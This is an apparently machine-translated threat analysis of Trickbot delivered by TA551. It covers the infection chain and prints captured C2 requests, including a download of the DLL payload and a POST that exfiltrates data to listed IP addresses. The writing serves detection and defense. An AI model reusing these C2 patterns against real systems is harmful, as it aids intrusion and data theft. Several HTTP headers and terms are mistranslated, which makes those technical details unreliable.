恶意软件分析：Trickbot

在今天这个时代，我们不再处理粗略拼凑起来的自制病毒。恶意软件是一个行业，专业开发人员可以通过窃取代码或故意协作进行交流。如今的攻击是多层次的，从最初的泄露到最终的数据过滤或加密，各种复杂的软件应用程序接管了攻击链上的不同工作。每个阶段的特定工具都是高度专业化的，通常可以作为服务租用，包括客户支持和专业（ab）使用的订阅模型。显然，这大大提高了恶意软件的可用性、潜在有效性和影响。听起来很可怕？

嗯，的确如此，但表面上的职业化实际上也有一些好的方面。一个因素是恶意软件中常见的某些重用模块可用于识别、跟踪和分析专业攻击软件。归根结底，这意味着，有足够的经验，熟练的分析师可以检测并阻止恶意软件的踪迹，通常损失最小或没有损失（如果攻击者通过了第一道防线）。

让我们看看这个机制在起作用，因为我们跟踪了一位实际的CyberSOC分析师，他正在调查被称为“Trickbot”的恶意软件案例

Trickbot的起源

Orange Cyberdefense的CyberSoc已经跟踪名为Trickbot的特定恶意软件一段时间了。它通常被认为是一种特定的威胁行为体，通常以巫师蜘蛛（Crowdstrike）、UNC1778（FireEye）或金布莱克本（Secureworks）的名字命名。

Trickbot是一种流行的模块化特洛伊木马，最初用于瞄准银行业，同时也被用于危害其他行业的公司。它提供多种类型的有效载荷。Trickbot逐渐演变为被不同的攻击集团用作恶意软件即服务（MaaS）。

众所周知，背后的威胁行为人行动迅速，使用众所周知的开采后工具Cobalt Strike横向移动公司网络安全基础设施，并部署Ryuk或Conti等勒索软件作为最后阶段。由于它用于初始访问，因此能够尽快检测到此威胁是成功防止进一步攻击的关键因素。

此威胁分析将重点关注名为TA551的威胁参与者，并以其使用Trickbot为例。我将介绍我们如何能够在杀戮链的不同步骤执行检测，从最初的感染到恶意垃圾邮件活动，再到检测威胁参与者在妥协期间使用的工具。我们还将提供一些有关威胁参与者如何使用此恶意软件及其演变的其他信息。

1 — 初始访问权限

自2021 6月起，TA551集团开始使用加密zip交付Trickbot恶意软件。电子邮件借口模仿重要信息以降低用户的警惕性。

附件包括。zip文件，其中再次包含一个文档。zip文件始终使用与“request.zip”或“info.zip”相同的名称，并且文档文件的名称相同。

注意：威胁行为人在使用Trickbot之前/同时使用相同的手法来传递其他恶意软件。在2021 6月至2021 9月的同一时期，我们观察到在初始访问负载上使用Bazarloader。

2 — 处决

当用户在启用宏的情况下打开文档时，将在系统上删除一个HTA文件，并使用cmd启动该文件。exe。HTA文件用于从远程服务器下载Trickbot DLL。

此行为与TA551相关，我们可以通过GET请求中的模式“/bdfh/”来识别它。

GET/bdfh/M8v[…]VUb HTTP/1.1

接受：*/*

主持人：wilkinstransportss。具有

内容类型：应用程序/八位字节流

注：与TA551相关的模式随着时间的推移而演变，自2021 8月中以来，该模式更改为“/bmdff/”。DLL注册为jpg文件以隐藏实际扩展名，并尝试通过regsvr32运行exe程序。然后，Trickbot将使用进程空心化技术注入到“wermgr.exe”中。

图1-在沙箱中执行Trickbot

3 — 收集

在成功的初始系统泄露之后，Trickbot可以使用合法的Windows可执行文件收集有关其目标的大量信息，并确定系统是否是Active Directory域的成员。

此外，对于此集合，Trickbot将扫描更多信息，如Windows build、公共IP地址、运行Trickbot的用户，以及系统是否位于NAT防火墙之后。

Trickbot还能够收集银行数据或凭据等敏感信息，并将其过滤到专用的命令和控制服务器（C2）。

4 — 命令（&A）；控制

当系统被感染时，它可以接触几种旋毛虫C2。主指挥控制系统是受害者系统与之通信的系统，主要用于获取新指令。

所有对Trickbot C2的请求使用以下格式：

“/&lt；GTAG&gt；/&lt；客户端ID&gt；/&lt；命令&gt；/&lt；总计

有关命令的信息&gt/“”

GET/zev4/56dLzNyzsmBH06b\U W10010240.42DF9F315753F31B13F17F5E731B7787/0/Windows 10 x64/1108/XX。XX。XX。XX/38245433F0E3D5689F6EE84483106F4382CC92EAFAD5120

6571D97A519A2EF29/0bqjxzSOQUSLPRJMQSWKDHTHKEG/HTTP/1.1

连接：保持活动状态

用户代理：curl/7.74.0

主持人：202.165.47.106

使用HTTP POST请求方法将收集的所有数据发送到单独的过滤Trickbot C2。请求格式保持不变，但命令“90”特定于数据过滤，更准确地说是从受感染的系统收集的系统数据。

POST/zev4/56DLZNYZSMH06B\U W10010240.42DF9F315753F31B13F17F5E731B7787/90/HTTP/1.1

连接：保持活动状态

内容类型：多部分/表单数据；边界=------绑定

ARY0F79C562

用户代理：Ghost

主持人：24.242.237.172:443

 

后续攻击：Cobalt Strike、Ryuk、Conti

Cobalt Strike[1]是一种功能齐全的商业远程访问工具，它自称为“敌方模拟软件，旨在执行有针对性的攻击并模拟高级威胁行为者的攻击后行动”。Cobalt Strike的交互式攻击后能力涵盖了ATT&amp；的全部范围；CK战术，全部在一个单一的综合系统内执行。

在我们的上下文中，Trickbot使用highjacked wermgr。exe进程将钴击信标加载到内存中。

一些勒索软件运营商也隶属于威胁行为体。Trickbot的目的是在实际勒索软件攻击之前执行初始访问。Conti和Ryuk是在Trickbot感染的最后阶段观察到的主要勒索工具，尽管目前还不是唯一的勒索工具。Conti是一个运营勒索软件即服务模式的集团，可供多个关联威胁参与者使用。另一方面，Ryuk是一种勒索软件，与Trickbot背后的威胁行为人有直接联系。

关键经验教训

威胁行为人通常仍然使用基本技术进入网络，如钓鱼电子邮件。提高对网络钓鱼的认识无疑是增强网络弹性的重要第一步。毕竟，最好的攻击是那些从未开始的攻击。

当然，网络中没有防弹预防保护这样的东西。更重要的是，要有在早期发现Trickbot的能力。尽管攻击链在整个过程中的每个阶段都可能被打破：越晚，完全妥协的风险越高，造成的损害也越大。Trickbot被不同的威胁参与者使用，但在其大多数特定阶段，检测方法保持不变。这里解释了一些折衷的指标。但恶意软件也会得到更新。

分析师必须保持警惕。跟踪和监视特定恶意软件或威胁行为体是跟踪其演变、改进并保持对威胁有效检测的最新信息的关键。

这是一个来自Security Navigator中发现的战壕的故事。此外，还可以找到更多恶意软件分析和其他有趣的内容，包括应急行动的描述、一位犯罪科学家对网络敲诈勒索的看法，以及大量有关安全形势的事实和数字。完整的报告可在Orange Cyberdefense网站上下载，请看一看。这是值得的！

[1] 斜接附件（&M）；CK COBALTSTREEK公司：https://attack.mitre.org/software/S0154/

本文作者弗洛里安古丁，Orange Cyberdefense的CyberSOC分析师。